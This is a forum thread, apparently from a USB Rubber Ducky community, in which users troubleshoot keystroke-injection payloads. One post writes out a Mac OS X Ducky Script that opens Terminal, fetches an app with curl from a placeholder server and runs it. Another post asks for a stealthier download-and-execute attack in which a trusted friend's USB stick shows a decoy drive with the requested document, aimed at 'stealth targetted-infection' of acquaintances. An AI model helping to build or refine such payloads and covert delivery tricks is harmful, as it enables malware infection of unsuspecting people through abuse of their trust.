ilikepineapple

Update : Tried it on a Mac OS X (not a mounted version) and the commands seemed to be working perfectly, all my bad! Only problem is that it was in canadian friench, therefore the layout must be different, as in the / key is replaced by the é key, how to fix that? making another keyboard layout only for canadian friench keyboards?

Oh, and second question, anyone knows why the commands/GUI aren't the same in these payloads meant for the same OS? https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---OS-X-Wget-and-Execute https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload----OSX-User-Backdoor I tried both but the COMMAND function seemed like the one actually working on my VMs for some reason, and if manually typing Terminal in, it would be able to access it and write the rest of the payload (in total jabberish of course). What bugs me above all is the fact that the hardest part is actually acheived, yet only the smallest technical difficulty holds me back to the point where I can absolutely not do anything at all. Best regards, -domino

I've recently been installing quite a couple virtual machines to try out my little duckies (nothing to say about the windows scripts, they work wonders and we have plenty of feedback on that part). Yet, I need infection penetration testing on Mac OS X, and I can't seem to find much going on around the forums about that subject. All I need, basically, is an understanding of their functionalities, and when I need a sudo password (like to disable Gatekeeper) or if simply being in terminal will bypass that for a simple app installation. I'm only looking to download and execute an application downloaded from an external website, but what bugs me the most is that I can't get past the first steps. I have been using Jesse Wallace (c0deous) and Patrick Mosca's help by taking parts of their codes to make it work, and have been changing remotely the language used both by the duckencoder 2.6.3 (or whatever version it is) for canada french, english (us-french), canada english, have been also transforming the keyboard mapping inside the virtual machine itself to make sure it fitted well with the injection, but nothing worked. Everytime I started the code DELAY 1000 COMMAND SPACE The space command seems to be working good at least haha, does open the top-right corner prompt DELAY 800 STRING Terminal Here starts the problem. Terminal comes out as something like IAELtmin, tried making a sense out of it but I really couldn't. Every language gave a different but similar output, and none was able to fix the problem. DELAY 500 ENTER Problem number 2 : Despite the weird wording, it doesnt even press enter at this point, because I see some recommendations from Apple being highlighted, so naturally after the first fail it should keep on going for the next, yet it doesnt, which is weird. DELAY 500 STRING curl http://SERVER/path/to/file.app > file.app ENTER DELAY 2000 (give it some time to download it) STRING open -a file ENTER And it keeps on writing without ever pressing the ENTER key, and mixing all the letters together. Now I've been working with iAtkos if anyone is familiar with it, all setup good, and have worked hours and tried many different variables to make this work but the foundations itself don't wok (even the online encoder couldn't give me a good inject.bin output on the field) So I was wondering if anyone has had these problems before, and if there is a way to fix it? Is it because it runs inside a VM and not a real Mac, and otherwise it would work? Is it simply because of an encoding/payload problem? Also, on a sidenote, living in a french-canadian area where I have no clue which language my friends have, I was wondering if the canadian keyboard was unilateral, same for everyone, and if, whether they are writing in english or french the payload should work anyways (all with canadian keyboards, all QWERTY, simply ctrl+shift changes the key mapping from french to english). Anyways, I'll be glad to hear from you guys soon, you seem like a great community, and this product is amazing as far as I tested it on Windows. Thanks in advance! -domino

Hello, I have just received my first duckies and started playing around with them and I gotta admit it is pretty fun. I have also found a great interest in the wget + execute function, especially if something can be worked out to do the same for .app on Mac OS X (if someone could help me out with that it'd help, I don't have any mac to help me out find which keys would allow me to remote download + execute). But most importantly, what's bothering me, is the lack of stealthiness of the actions. *** Bob tells his friend he needs a certain doc Adam answers him sure, let me put it on my USB and let me hand it to you. Adam quickly makes a payload (pre-written and probably pre-compiled too) and puts it inside the SD card. Adam tells him hey, here's the file! Bob inserts the rubber duckyB Bob only sees a couple of things popping up by themselves on the screen, but never ends up with the actual file he's looking for. *** This is a payload for social engineering 2.0 that I'm looking for, as, for now, the only ones available can remotely download and execute files, or fuckup the OS it's on, but anyone looking at the screen while the USB key is plugged will still see something fishy going on, especially if nothing happens afterwards. THEREFORE (getting to the point), I'd like to know if a payload exists, or if it is even possible to actually mount the SD card that is inside the emulator so that we get a double-entry, one of an emulator, and the other one of a stoarge unit, that would allow the opening of a new folder that would appear as an external drive to the user, and where we could put whatever .doc or .pdf that is needed to be transfered? Such a method would allow stealth targetted-infection and much less social engineering and "hoping" that someone just picks up a random USB key and plugs it in to see what happens. Also, the success rate would be much bigger, since you'd be standing right by the person inserting it and he would trust you, since after the little payload of wget and execute is loaded, a windows showing up a mounted external drive with the requested files appear (any non-IT guy would then assume that whatever happened beforewards was just to mount the card/storage) It has been brought to me the idea of creating a folder in %temp% and name it USB KEY where we would download the file to afterwards open it, but it still seems fishy in case the internet connection isn't quite good, and simply because of the location of the "drive", and, MOST OF ALL, because there actually IS an SD card that should be available to be mounted somehow. I have read through a lot of forums and guides and yet couldn't find a payload or any hints as to how to make the emulator recognize the SD card it's using as a drive that's browsable and put some files inside that could be used by whoever plugs the key. If anyone could help me out with that, this would bring the ducky's power to a brand new level. Thanks in advance, -pineapple